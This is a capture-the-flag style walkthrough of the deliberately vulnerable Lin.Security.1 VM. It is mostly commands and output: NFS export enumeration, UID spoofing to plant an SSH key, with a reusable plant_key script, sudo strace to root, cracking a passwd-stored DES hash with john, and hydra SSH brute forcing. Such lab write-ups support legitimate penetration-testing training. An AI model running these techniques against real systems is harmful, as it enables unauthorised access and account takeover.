Lin.Security.1 Walkthrough (OSCP Prep) - c0dedead.io

Lin.Security.1 Walkthrough (OSCP Prep)

Host Discovery

First things first, let’s find the target on our network.

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ sudo arp-scan -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:4c:9e:c7, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:f3:16:00       VMware, Inc.
10.0.10.103     00:0c:29:ed:97:a9       VMware, Inc.
10.0.10.199     00:50:56:fa:ab:65       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded

We find the target machine at 10.0.10.103. We can update /etc/hosts to make things easier:

10.0.10.103     linsecurity

Scanning

Now let’s see what this host has open to us.

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ rustscan -a linsecurity -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.103:22
Open 10.0.10.103:111
Open 10.0.10.103:2049
Open 10.0.10.103:34199
Open 10.0.10.103:45371
Open 10.0.10.103:47855
Open 10.0.10.103:60961
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.103
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-10 19:27 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.103 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning linsecurity (10.0.10.103) [7 ports]
Discovered open port 111/tcp on 10.0.10.103
Discovered open port 22/tcp on 10.0.10.103
Discovered open port 45371/tcp on 10.0.10.103
Discovered open port 2049/tcp on 10.0.10.103
Discovered open port 60961/tcp on 10.0.10.103
Discovered open port 47855/tcp on 10.0.10.103
Discovered open port 34199/tcp on 10.0.10.103
Completed Connect Scan at 19:27, 0.00s elapsed (7 total ports)
Initiating Service scan at 19:27
Scanning 7 services on linsecurity (10.0.10.103)
Completed Service scan at 19:27, 6.01s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.10.103.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.02s elapsed
Nmap scan report for linsecurity (10.0.10.103)
Host is up, received conn-refused (0.00025s latency).
Scanned at 2021-11-10 19:27:53 CST for 6s

PORT      STATE SERVICE  REASON  VERSION
22/tcp    open  ssh      syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
2049/tcp  open  nfs_acl  syn-ack 3 (RPC #100227)
34199/tcp open  mountd   syn-ack 1-3 (RPC #100005)
45371/tcp open  nlockmgr syn-ack 1-4 (RPC #100021)
47855/tcp open  mountd   syn-ack 1-3 (RPC #100005)
60961/tcp open  mountd   syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

We see rpcbind on 111, NFS on 2049 and mountd on several high ports, so this box is an NFS server. The first thing to do is enumerate what it exports:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ showmount -e linsecurity
Export list for linsecurity:
/home/peter *

We find what appears to be a user’s home directory exported to the whole network (the * means any client may mount it). If we can write to it, dropping an SSH key into .ssh/authorized_keys should get us a shell as that user.


Exploiting a Shared Home Directory

Let’s create a local directory and mount the network share:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ mkdir peter

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ sudo mount -t nfs linsecurity:/home/peter ./peter -o nolock

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ cd peter

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ ls -la
drwx------@    - cvechecker inetsim 10 Jul  2018 .cache
drwx------@    - cvechecker inetsim 10 Jul  2018 .gnupg
drwxrwxr-x@    - cvechecker inetsim 10 Jul  2018 .local
.rw-r--r--@  220 cvechecker inetsim  9 Jul  2018 .bash_logout
.rw-r--r--@ 3.8k cvechecker inetsim  9 Jul  2018 .bashrc
.rw-rw-r--@    0 cvechecker inetsim 10 Jul  2018 .cloud-locale-test.skip
.rw-r--r--@  807 cvechecker inetsim  9 Jul  2018 .profile

There is nothing immediately interesting here, but do we have write access?

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

So we don’t have write access as our own user, but this is easy to get around. With the default sec=sys authentication, NFS simply trusts whatever UID the client presents, so any local account whose UID matches the directory owner is “peter” as far as the server is concerned. (Root is the one exception: exports squash root to nobody by default, so sudo alone will not do it.) The owner’s UID is 1001; if your ls output doesn’t show it, check with stat -c '%u' peter. On my machine there is already a user cvechecker with that ID, which is why the listing above shows that name. If there is no such user on yours, create one with useradd -u 1001 <name>.

Now we should be able to start a shell with the correct user ID and write to the mounted directory:

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ sudo -u cvechecker bash
[cvechecker@apophis peter]$ mkdir .ssh

Now we can add our SSH public key to .ssh/authorized_keys (still as the UID-1001 user, so that the directory and file end up owned by peter on the server and sshd’s StrictModes check is happy) and try to SSH in:

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ ssh -l peter linsecurity
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':

[lin.security ASCII-art banner]
Welcome to lin.security | https://in.security | version 1.0

And we’re in!
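
The whole procedure above, collected into a small script. This is an added example, not code from the original walkthrough; the host name, mount point and key path are placeholders, and it assumes an export using the default sec=sys authentication with root squashed, plus GNU stat and sudo on the attacking machine.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): the NFS "borrow the
# owner's UID" trick, as reusable functions.
#
# Assumptions (hypothetical, adjust to your lab):
#   - the export uses the default sec=sys (AUTH_SYS), so the server trusts
#     the UID the client presents, and root is squashed (also the default),
#     so we need a real local account with the owner's UID rather than root.
#   - GNU coreutils (stat -c) and sudo are available on the attacking host.
set -eu

# UID that owns the mounted export, i.e. the identity the server will trust.
export_owner_uid() {
    stat -c '%u' "$1"
}

# Run a command as a numeric UID. If we already are that UID, just run it;
# otherwise use sudo's "#uid" syntax, creating a throwaway local account
# first when no user with that UID exists (the walkthrough reused cvechecker).
run_as_uid() {
    uid=$1
    shift
    if [ "$(id -u)" = "$uid" ]; then
        "$@"
    else
        if ! getent passwd "$uid" >/dev/null; then
            sudo useradd -M -s /usr/sbin/nologin -u "$uid" "nfs-uid-$uid"
        fi
        sudo -u "#$uid" "$@"
    fi
}

# Append a public key to <mounted home>/.ssh/authorized_keys, acting as the
# directory's owner so the new files carry the right UID on the server, and
# with the modes sshd's StrictModes expects (700 on .ssh, 600 on the file).
# Prints the UID it acted as.
plant_key() {
    hdir=$1
    pubkey_file=$2
    owner=$(export_owner_uid "$hdir")
    run_as_uid "$owner" mkdir -p "$hdir/.ssh"
    run_as_uid "$owner" chmod 700 "$hdir/.ssh"
    run_as_uid "$owner" sh -c 'umask 077; cat >> "$1/.ssh/authorized_keys"' _ "$hdir" < "$pubkey_file"
    run_as_uid "$owner" chmod 600 "$hdir/.ssh/authorized_keys"
    echo "$owner"
}

# Typical use (hypothetical share and key path):
#   sudo mkdir -p peter && sudo mount -t nfs -o nolock linsecurity:/home/peter ./peter
#   plant_key ./peter ~/.ssh/id_rsa.pub      # then: ssh -l peter linsecurity
```

Run plant_key against the mounted directory. The chmod steps matter: sshd with StrictModes (the default) ignores an authorized_keys file that is group- or world-writable, and the files have to be owned by the target user on the server, which is exactly what acting as UID 1001 achieves. If the export had been made with no_root_squash, the same functions would work as root without creating any account.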

There are a number of different routes to root on this box. I’ll cover three here.


Privilege Escalation – First Method

Having obtained access as user peter, let’s see if he has any sudo privileges on the machine:

peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

So he can run strace as root without a password. A quick check of GTFOBins shows this can be used to spawn a root shell: strace simply executes the program it is told to trace, here sh, with the privileges sudo gave it, and -o /dev/null discards the trace output. Let’s try it:

peter@linsecurity:~$ sudo strace -o /dev/null sh
# id
uid=0(root) gid=0(root) groups=0(root)

Well, that was easy!


Privilege Escalation – Second Method

That was too easy! Let’s see if we can find another way in. What other users are on the system?

peter@linsecurity:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
statd:x:111:65534::/var/lib/nfs:/usr/sbin/nologin
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash

One thing that sticks out is the insecurity user. Beyond the username itself, there are two things of note:

  • The user’s UID:GID is 0:0, so this is a second root account under another name
  • The second field holds an actual password hash instead of x, so the hash sits in the world-readable /etc/passwd rather than in /etc/shadow; 13 characters with no $ prefix means traditional DES crypt(3), which is very fast to crack
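
The review of /etc/passwd done by eye above, as a few shell functions. This is an added example, not part of the original walkthrough; the functions take any passwd-format file, so they can be run against a copy pulled off a target, and the embedded sample is constructed from the relevant lines of the listing above.

```shell
#!/bin/sh
# Added example (not part of the original walkthrough): the /etc/passwd
# review, as reusable functions. Each takes a passwd-format file and prints
# one finding per line.
set -eu

# Accounts with UID 0 that are not named root: extra superuser logins.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose password field holds a real hash instead of "x" (shadowed),
# "*" or "!" (locked). Such hashes are world-readable and crackable offline.
hashes_in_passwd() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 ":" $2 }' "$1"
}

# Rough hash-type hint from the format: 13 characters with no "$" prefix is
# traditional DES crypt(3) (john's "descrypt"), the fastest to brute-force.
hash_type() {
    case "$1" in
        \$1\$*)        echo md5crypt ;;
        \$5\$*)        echo sha256crypt ;;
        \$6\$*)        echo sha512crypt ;;
        \$y\$*|\$7\$*) echo yescrypt ;;
        *) if [ "${#1}" -eq 13 ]; then echo descrypt; else echo unknown; fi ;;
    esac
}

# Candidate usernames for password guessing: ordinary users (UID >= 1000,
# not nobody) with a real login shell. Feed the output to hydra -L.
login_users() {
    awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Constructed sample: the relevant lines of the box's /etc/passwd listing.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash
EOF
}

# Typical use against a copy of the target's file:
#   extra_uid0_accounts passwd.txt; hashes_in_passwd passwd.txt; login_users passwd.txt > users.txt
```

login_users is the seed for the users.txt used in the third method (the walkthrough drops peter and insecurity by hand because they are already owned). To confirm a cracked password without john, `perl -e 'print crypt("P@ssw0rd", "AzER3pBZh6WZE"), "\n"'` should print the hash back on any system whose crypt(3) still supports DES.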

So if we can crack this hash, we should be able to log in with root privileges! Since I’m running on a VM, I’ll use john to attempt to crack this hash:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ echo AzER3pBZh6WZE > hash

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed.  CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message.  If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd         (?)
1g 0:00:00:00 DONE (2021-11-10 20:36) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..bibiana
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we have the password: P@ssw0rd.

Does it work?

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ ssh -l insecurity linsecurity
insecurity@linsecurity's password:

[lin.security ASCII-art banner]
Welcome to lin.security | https://in.security | version 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

# id
uid=0(root) gid=0(root) groups=0(root)

Bingo!


Privilege Escalation – Third Method

Finally, let’s take the usernames we enumerated from /etc/passwd and see whether any of them have guessable passwords. Create a file (users.txt) with the usernames we found:

bob
susan

I’ll ignore the peter and insecurity users because we already have access to them. Now, use hydra to try to brute-force a password. Since brute-forcing SSH is very slow, we will use a small wordlist:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ hydra -L users.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt linsecurity ssh -t 4
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 20:42:54
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:2/p:500), ~250 tries per task
[DATA] attacking ssh://linsecurity:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 956 to do in 00:22h, 4 active
[22][ssh] host: linsecurity   login: bob   password: secret

After a few minutes, we have creds: bob:secret. SSH in and see what Bob can do:

bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

One has to wonder why not just grant full sudo access if you’re going to allow all of these programs. GTFOBins has a route to a root shell for many (if not all) of them, but with shells in the list there is no need to be clever, so I’ll take the simplest route:

bob@linsecurity:~$ sudo sh
# id
uid=0(root) gid=0(root) groups=0(root)

And there you have it.
